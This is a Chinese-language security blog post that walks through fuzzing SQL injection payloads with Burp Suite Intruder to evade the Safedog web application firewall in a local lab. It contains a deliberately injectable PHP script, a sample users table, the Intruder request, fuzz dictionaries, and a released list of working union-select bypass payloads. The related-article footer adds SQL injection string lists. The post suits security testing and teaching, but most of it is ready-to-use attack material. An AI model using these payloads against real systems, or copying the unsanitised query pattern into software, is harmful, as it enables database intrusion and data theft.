Fuzzing---Sql injection bypass with BurpSuite

最新推荐文章于 2024-05-09 13:44:25 发布
最新推荐文章于 2024-05-09 13:44:25 发布
阅读量363 收藏
点赞数
文章标签: mysql php oracle 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486774
版权

前言

  • 纵观全网进行各种bypass的很少涉及具体测试过程,大多是直接放出payload。那么很快防护软件就会进行更新策略,有效的payload存活时间很短。
  • 最近也发现一些很nice的作者,会放出fuzz的脚本,这样就是“授之以渔”了,我们应该感谢作者的分享精神。
  • burpsuite是一款神器,很多操作都可以借助它来完成,也是我们做安全研究必备的一款工具。fuzz说白了就是不断地提交、不断地测试,看返回结果来判断payload是否有效,那么我们可以结合burpsuite的intruder模块来进行fuzz,同样可以达到很好的效果。

Fuzzing环境

  • 善于思考的脑子

20166261274990173.jpg
  • phpStudy2017
    image.png
  • 二狗子v4.0
    image.png
  • BurpSuite

Fuzzing过程

先准备一个测试sql注入的脚本

<title>Fuzzing 2dog</title>>
<?php
$link = mysql_connect('localhost', 'root', 'root'); mysql_select_db('security', $link);
 
$sql = 'select * from `users` where `id`='.$_REQUEST['id']; 
echo "执行的SQL语句<br />\n";
echo $sql."<br>\n";
$result =mysql_query($sql);

while($array = mysql_fetch_assoc($result))
    { 
        echo "<br />\n";
        echo "Bypass 2dog success!";
        echo "<br />\n";
        echo "id=".$array['id']."<br />\n";
        echo "username=".$array['username']."<br />\n"; 
        echo "password=".$array['password']."<br />\n";
    }
echo mysql_error();
?>

再来份数据库security

DROP TABLE IF EXISTS `users`;
CREATE TABLE `users` (
  `id` int(3) NOT NULL AUTO_INCREMENT,
  `username` varchar(20) NOT NULL,
  `password` varchar(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=gbk;

# Data for table "users"

INSERT INTO `users` VALUES (1,'Dumb','Dumb'),(2,'Angelina','I-kill-you'),(3,'Dummy','[email protected]'),(4,'secure','crappy'),(5,'stupid','stupidity'),(6,'superman','genious'),(7,'batman','mob!le'),(8,'admin','admin'),(9,'admin1','admin1'),(10,'admin2','admin2'),(11,'admin3','admin3'),(12,'dhakkan','dumbo'),(14,'admin4','admin4');

环境配置好后,访问

1.png

现在测一下二狗子能否正常运作(拦截攻击)
2.png

嗯,很完美的拦截了。现在可以放心的进行fuzz了...
先开代理,burpsuite抓包,进入intruder模块 
GET /sqli-labs/Less-1/?id=1/*!union/*/*§a§§b§select*/1,2,3 HTTP/1.1
Host: 192.168.8.14
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: yunsuo_session_verify=0d351ecd28be2363b55de180b78b8dc8; safedog-flow-item=

根据观察以往多种bypass的payload,我们这里测试可以更方便的设置fuzz对象/*!union/*/*<fuzz_1><fuzz_2>select*/1,2,3
现在准备两份payload字典:

  1. 注释
/*
/*/*
*/
/**/
/*/**/
/*!
/*!*/
/*!/*!*/
/*?
/*^
  1. 特殊字符
~
!
?
%
%00
%23
%0a
%0b
%0c
%0d
%0e
%0f
%0g
%0h
%0i
%0j
%0k
%0l
%0m
%0n
%0o
%0p
%0q
%0r
%0s
%0t
%0u
%0v
%0w
%0x
%0y
%0z

Attack type设为Cluster Bomb

3.png

进入Options设置response包匹配关键字 Bypass
4.png

go起来,看看fuzz结果如何
5.png

fuzz的成果显著,但执行敏感函数还是会被二狗子拦截(必须的)
6.png

那就继续fuzz呗,动手吧骚年!
7.png

结语

放出一部分payload给伸手党吧,希望你们能掌握这种方便的fuzz方法,将burpsuite神技发扬光大。

Bypass    `id`=1
true    /*!union/*/*%0i*/select*/1,2,3
true    /*!union/*/*%0j*/select*/1,2,3
true    /*!union/*/*%0m*/select*/1,2,3
true    /*!union/*/*%0x^*/select*/1,2,3
true    /*!union/*/*%0z^*/select*/1,2,3
true    /*!union/*/*%0y^*/select*/1,2,3

另外:

  • 关于块注释/*和内联注释/*!/*/**/这样是等效于/**/的,mysql中/*!/*!*/是等效于/*!*/的
  • 关于内联注释/*!50100*/特别注意50100表示mysql的版本5.01.00或者更高的版本,才有效不报错。也就是说内联注释可以从/*!00000*/到/*!50100*/都可以作为payload
  • 关于fuzz的point多尝试,多看看以往的bypass payload,就能从中找到一些规律,提高fuzz效率
KEY0NE
关注
【漏洞挖掘】——131、 NoSQL Injection刨析
Fly_鹏程万里
07-26 224
NoSQL Injection是一种针对NoSQL数据库的安全漏洞,类似于传统的SQL注入攻击,NoSQL数据库是一类非关系型数据库,例如:MongoDB、Cassandra、Redis等,它们使用不同的数据存储和查询机制,NoSQL Injection漏洞的本质是未正确验证和过滤用户输入导致攻击者能够执行未经授权的操作从而破坏数据库的完整性、泄露敏感数据或执行其他恶意行为$where:匹配满足JavaScript表达式的内容$ne:匹配所有不等于指定值的值$in-:匹配数组中指定的所有值。
SQLI FUZZ字典
weixin_44364851的博客
12-19 1520
“or “a”=“a ')or(‘a’=‘a or 1=1– ‘or 1=1– a’or’ 1=1– "or 1=1– ‘or’a’=‘a “or”="a’=‘a ‘or’’=’ ‘or’=‘or’ 1 or ‘1’=‘1’=1 1 or ‘1’=‘1’ or 1=1 'OR 1=1 “or 1=1 'xor ‘or 1=1/* 1’or’1’=‘1 ’ a’ or 1=1– “a”” or 1=1–” or a = a a’ or ‘a’ = ‘a 1 or 1=1 a’ waitfor delay ‘0
sql_fuzz-检测waf过滤关键字字典.txt
09-26
非常全面的SQL注入关键字检测字典,检测网站waf过滤了哪些关键字的字典,配合burpsuit使用非常有效。
SQL Injection bypass WAF
arthur2612的博客
11-01 218
tips: 利用的注射点: 支持Union 可报错 支持多行执行、可执行系统命令、可HTTP Request等额外有利条件 若非以上类型,则可能需要暴力猜解。猜解时,可能会遇到一些限制。攻击者要做的,就是将其个个击破。 1. 通过greatest函数绕过不能使用大小于符号的情况 猜解单个字符时,通常使用折半查找。 mysql> select as...
利用 Burpsuite Fuzz 实现 SQL 注入
凡宇
07-18 9557
0x01 注入前分析 是个典型的登录框SQL注入题 在源码上还有hint 首先进行注入前的尝试,观察是否有报错情况,或者是有waf: 正常的输入,分2种情况: 用户名正确,显示密码错误password error 用户名错误,显示无此用户no such user! 猜测验证用户名和验证密码是分步进行的,语句如下: select uname from use...
SQL注入及其bypass
qq_45944626的博客
08-24 1768
SQL注入及其bypassSQL注入整数型注入字符型注入报错注入布尔盲注时间盲注cookie注入UA注入bypass常用函数罕见函数代替空格特殊符号绕过WAF SQL注入 整数型注入 加入单引号 语句出错,不会回显 加and 1=1 语句执行正常,返回一般页面 加and 1=2 语句正常运行,返回原网页,但无法查询结果 id=1 order by 1 查询数据库长度,若为2 id=-1 union select 1,2 查看回显位置,若为1,2,则可在1,2处添加查询语句 id=-1 unio
Python攻防-Fuzz绕过安全狗进行SQL注入
道阻且长,行则将至。
04-19 3869
文章目录前言WAF部署WAF简述网站安全狗Fuzz脚本绕过Fuzz脚本脚本效果SQLMap绕过Fuzz关键词tamper绕过总结 前言 在渗透测试过程中,经常会遇到很多 Web 站点部署了 WAF,这个时候使用常规的 Payload 进行 XSS、SQL 注入的检测避免不了被 WAF 拦截阻断的命运。 Fuzz 模糊测试是一种有效的检测 WAF 过滤规则缺陷并尝试进行 WAF 绕过的技术,本文将以“PhpStudy+DVWA+ 安全狗v4.0”的实验环境演示 Fuzz 测试绕过 WAF。 WAF部署 我在
网络逻辑漏洞、SQLMAP、Nmap、burpsuite及其命令的使用方法
weixin_65695770的博客
04-07 4229
SQLMAP sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试神器、通过数据库指纹提取访问底层文件系统并通过外带连接执行命令。 支持的数据库MySQLOracle, PostgreSQL, SQL Server, Microsoft Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MAXDB。 sqlmap支持五种不同的注入模
XSS入门到进阶
似水流年
11-01 1034
XSS入门到进阶 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6tcYY5nE-1604207447472)(https://raw.githubusercontent.com/Harveysn0w/MAC_note-img/main/640.jpeg)] XSS简介 XSS分类 XSS实战 XSS Fuzzing XSS WAF Bypass思路 XSS工具 XSS修复 xss简介 OWASP TOP 10 OWASP(开放式Web应用程序安全项目)的工具、文档、论坛
sql注入字典fuzz
01-11
sql注入字典fuzz
SQL注入 FUZZ关键字 字典
08-20
SQL注入 FUZZ关键字 字典
Web安全攻防渗透测试实战指南笔记 三
Ren59421的博客
04-05 8054
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQLPHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
SQL注入(注入姿势和Bypass
2301_79870948的博客
03-20 981
UNION 操作符用于连接两个以上的 SELECT 语句的结果组合到一个结果集合中。前提是两个select必有相同列。注意:要用联合查询进行注入则:页面必须有显示位首先,便要判断注入点的列数,这里使用order by + 列数--+联合查询注入:这里通过查询数据表不存在的数据,从而执行后面的union语句,来获取显示位使用联合查询注入爆出敏感数据:得到了数据库名后,进行下一步,得到表名下一步,得到字段名,强调数据库名和表名可以使查到的数据更准),3--+
2-2 Burpsute Pro Fuzzing 介绍
山兔的博客
12-05 650
Fuzzing测试 实战演示 打开sqlilab靶场,选择less-1 在域名处输?id=1 打开BP,进行截断 这样子BP就有了数据包,来请求192.168.248.132,对应下的sqli-labs文件目录下的less-1的index.php,并且提交参数是id=1 那么接下来就进行Fuzzing测试,以对应的sql注入为例,进行演示,我们首先点击Action,Send into intruder 送到intruder模块 点击Positions 点击Clear § 直接选中1这个位置,Add
BurpSuite Fuzz
weixin_46104215的博客
10-18 428
转载:利用 Burpsuite Fuzz 实现 SQL 注入_凡宇-CSDN博客
Burpsuite识别防范
最新发布
Fly_鹏程万里
05-09 520
Burpsuite是一款常用的渗透测试工具,我们可以在配置代理后借助Burpsuite实现对数据报文的拦截、篡改等大量的Fuzzing测试,而对于一个WEB系统来说,当又用户通过Burpsuite代理来访问网站,那么多半说明这个用户是一个测试人员,我们就可以将其标记为一个非正常用户,直接拉入黑名单列表,本篇文章主要介绍关于Burpsuite代理的识别和防范措施。
Arab Portal 2.2 (Auth Bypass) Blind SQL Injection
B.S.D 攻防小組
08-18 838
 #!/usr/bin/ruby#=============================================##          Arab Portal v2.2 Exploit           #,# Blind SQL Injection / Authentication Bypass ##  Discovered & written by: Jafer Al-Z
mysql fuzzing_Tips-sql注入漏洞模糊测试
weixin_33518100的博客
01-28 457
# Tips-sql注入模糊测试该清单中包含一些安全从业人员常用的,针对指定数据库进行sql注入漏洞测试的payload,在安全测试的第一个阶段,我们可以借助外部的一些安全工具,比如nmap进行识别服务器端数据库的指纹信息,更有利于后续的模糊测试。## 字符串串联将多个字符串拼接在一起,返回一个新的字符串。| Oracle | 'foo'||'bar' ...
burpsuite fuzz sql注入
02-19
Burp Suite是一款常用的Web应用程序安全测试工具,其中的Fuzzing功能可以用于检测和利用SQL注入漏洞。SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过构造恶意的SQL查询语句来绕过应用程序的身份验证和访问控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值